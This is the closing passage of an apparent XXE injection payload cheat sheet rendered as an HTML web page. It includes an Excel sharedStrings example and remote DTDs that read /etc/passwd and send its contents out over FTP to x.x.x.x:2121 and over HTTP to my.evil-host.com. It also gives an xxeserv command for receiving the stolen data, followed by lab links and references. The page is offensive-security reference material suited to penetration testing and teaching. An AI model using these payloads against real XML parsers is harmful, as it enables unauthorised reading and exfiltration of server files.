<a id="__codelineno-39-3" name="__codelineno-39-3" href="#__codelineno-39-3"></a><span class="nt">&lt;sst</span><span class="w"> </span><span class="na">xmlns=</span><span class="s">&quot;http://schemas.openxmlformats.org/spreadsheetml/2006/main&quot;</span><span class="w"> </span><span class="na">count=</span><span class="s">&quot;10&quot;</span><span class="w"> </span><span class="na">uniqueCount=</span><span class="s">&quot;10&quot;</span><span class="nt">&gt;&lt;si&gt;&lt;t&gt;</span><span class="ni">&amp;rrr;</span><span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testA2<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testA3<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testA4<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testA5<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testB1<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testB2<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testB3<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testB4<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;si&gt;&lt;t&gt;</span>testB5<span class="nt">&lt;/t&gt;&lt;/si&gt;&lt;/sst&gt;</span>
</code></pre></div>
<p>Using a remote DTD will save us the time to rebuild a document each time we want to retrieve a different file.
Instead we build the document once and then change the DTD.
And using FTP instead of HTTP allows to retrieve much larger files.</p>
<p><code>xxe.dtd</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-40-1" name="__codelineno-40-1" href="#__codelineno-40-1"></a><span class="cp">&lt;!ENTITY % d SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-40-2" name="__codelineno-40-2" href="#__codelineno-40-2"></a><span class="cp">&lt;!ENTITY % c &quot;&lt;!ENTITY rrr SYSTEM &#39;ftp://x.x.x.x:2121/%d;&#39;&gt;</span>&quot;&gt;
</code></pre></div>
<p>Serve DTD and receive FTP payload using <a href="https://github.com/staaldraad/xxeserv">staaldraad/xxeserv</a>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-41-1" name="__codelineno-41-1" href="#__codelineno-41-1"></a><span class="p">$</span> <span class="n">xxeserv</span> <span class="n">-o</span> <span class="n">files</span><span class="p">.</span><span class="n">log</span> <span class="n">-p</span> <span class="n">2121</span> <span class="n">-w</span> <span class="n">-wd</span> <span class="n">public</span> <span class="n">-wp</span> <span class="n">8000</span>
</code></pre></div>
<h3 id="xxe-inside-dtd-file">XXE Inside DTD file</h3>
<p>Most XXE payloads detailed above require control over both the DTD or <code>DOCTYPE</code> block as well as the <code>xml</code> file.
In rare situations, you may only control the DTD file and won't be able to modify the <code>xml</code> file. For example, a MITM.
When all you control is the DTD file, and you do not control the <code>xml</code> file, XXE may still be possible with this payload.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-42-1" name="__codelineno-42-1" href="#__codelineno-42-1"></a><span class="cm">&lt;!-- Load the contents of a sensitive file into a variable --&gt;</span>
<a id="__codelineno-42-2" name="__codelineno-42-2" href="#__codelineno-42-2"></a><span class="cp">&lt;!ENTITY % payload SYSTEM &quot;file:///etc/passwd&quot;&gt;</span>
<a id="__codelineno-42-3" name="__codelineno-42-3" href="#__codelineno-42-3"></a><span class="cm">&lt;!-- Use that variable to construct an HTTP get request with the file contents in the URL --&gt;</span>
<a id="__codelineno-42-4" name="__codelineno-42-4" href="#__codelineno-42-4"></a><span class="cp">&lt;!ENTITY % param1 &#39;&lt;!ENTITY &amp;#37; external SYSTEM &quot;http://my.evil-host.com/x=%payload;&quot;&gt;</span>&#39;&gt;
<a id="__codelineno-42-5" name="__codelineno-42-5" href="#__codelineno-42-5"></a>%param1;
<a id="__codelineno-42-6" name="__codelineno-42-6" href="#__codelineno-42-6"></a>%external;
</code></pre></div>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://www.root-me.org/en/Challenges/Web-Server/XML-External-Entity">Root Me - XML External Entity</a></li>
<li><a href="https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection">PortSwigger Labs for XXE</a><ul>
<li><a href="https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files">Exploiting XXE using external entities to retrieve files</a></li>
<li><a href="https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf">Exploiting XXE to perform SSRF attacks</a></li>
<li><a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction">Blind XXE with out-of-band interaction</a></li>
<li><a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities">Blind XXE with out-of-band interaction via XML parameter entities</a></li>
<li><a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration">Exploiting blind XXE to exfiltrate data using a malicious external DTD</a></li>
<li><a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages">Exploiting blind XXE to retrieve data via error messages</a></li>
<li><a href="https://portswigger.net/web-security/xxe/lab-xinclude-attack">Exploiting XInclude to retrieve files</a></li>
<li><a href="https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload">Exploiting XXE via image file upload</a></li>
<li><a href="https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd">Exploiting XXE to retrieve data by repurposing a local DTD</a></li>
</ul>
</li>
<li><a href="https://gosecure.github.io/xxe-workshop">GoSecure workshop - Advanced XXE Exploitation</a> </li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://www.synack.com/blog/a-deep-dive-into-xxe-injection/">A Deep Dive into XXE Injection - Trenton Gordon - July 22, 2019</a></li>
<li><a href="https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation">Automating local DTD discovery for XXE exploitation - Philippe Arteau - July 16, 2019</a></li>
<li><a href="http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html">Blind OOB XXE At UBER 26+ Domains Hacked - Raghav Bisht - August 5, 2016</a></li>
<li><a href="https://www.synacktiv.com/ressources/advisories/TIBCO_JasperReports_Server_XXE.pdf">CVE-2019-8986: SOAP XXE in TIBCO JasperReports Server - Julien Szlamowicz, Sebastien Dudek - March 11, 2019</a></li>
<li><a href="https://infosecwriteups.com/data-exfiltration-using-xxe-on-a-hardened-server-ef3a3e5893ac">Data exfiltration using XXE on a hardened server - Ritik Singh - January 29, 2022</a></li>
<li><a href="http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html">Detecting and exploiting XXE in SAML Interfaces - Christian Mainka (@CheariX) - November 6, 2014</a></li>
<li><a href="https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf">Exploiting XXE in file upload functionality - Will Vandevanter (@<em>will_is</em>) - November 19, 2015</a></li>
<li><a href="https://www.4armed.com/blog/exploiting-xxe-with-excel/">EXPLOITING XXE WITH EXCEL - Marc Wickenden - November 12, 2018</a></li>
<li><a href="https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/">Exploiting XXE with local DTD files - Arseniy Sharoglazov - December 12, 2018</a></li>
<li><a href="https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/">From blind XXE to root-level file read access - Pieter Hiele - December 12, 2018</a></li>
<li><a href="https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/">How we got read access on Googles production servers - Detectify - April 11, 2014</a></li>
<li><a href="https://jbz.team/midnightsunctfquals2019/Rubenscube">Midnight Sun CTF 2019 Quals - Rubenscube - jbz - April 6, 2019</a></li>
<li><a href="https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf">OOB XXE through SAML - Sean Melia (@seanmeals) - January 2016</a></li>
<li><a href="https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/">Payloads for Cisco and Citrix - Arseniy Sharoglazov - January 1, 2016</a></li>
<li><a href="https://phonexicum.github.io/infosec/xxe.html">Pentest XXE - @phonexicum - March 9, 2020</a></li>
<li><a href="https://www.netspi.com/blog/technical-blog/web-application-pentesting/playing-content-type-xxe-json-endpoints/">Playing with Content-Type XXE on JSON Endpoints - Antti Rantasaari - April 20, 2015</a></li>
<li><a href="https://www.optistream.io/blogs/tech/redteam-stories-1-soapy-xxe">REDTEAM TALES 0X1: SOAPY XXE - Uncover and exploit XXE vulnerability in SOAP WS - Optistream - May 27, 2024</a></li>
<li><a href="https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870">XML attacks - Mariusz Banach (@mgeeky) - December 21, 2017</a></li>
<li><a href="https://portswigger.net/web-security/xxe">XML external entity (XXE) injection - PortSwigger - May 29, 2019</a></li>
<li><a href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing">XML External Entity (XXE) Processing - OWASP - December 4, 2019</a></li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html">XML External Entity Prevention Cheat Sheet - OWASP - February 16, 2019</a></li>
<li><a href="https://labs.integrity.pt/articles/xxe-all-the-things-including-apple-ioss-office-viewer/">XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer) - Bruno Morisson - August 14, 2015</a></li>
<li><a href="https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html">XXE in Uber to read local files - httpsonly - January 24, 2017</a></li>
<li><a href="https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/">XXE inside SVG - YEO QUAN YANG - June 22, 2016</a></li>
<li><a href="https://gist.github.com/staaldraad/01415b990939494879b4">XXE payloads - Etienne Stalmans (@staaldraad) - July 7, 2016</a></li>
<li><a href="https://2017.zeronights.org/wp-content/uploads/materials/ZN17_yarbabin_XXE_Jedi_Babin.pdf">XXE: How to become a Jedi - Yaroslav Babin - November 6, 2018</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 30, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
<script defer src="https://cloud.umami.is/script.js" data-website-id="82be5164-e1f3-4cb0-bd22-20e02086d3d4"></script>
</div>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink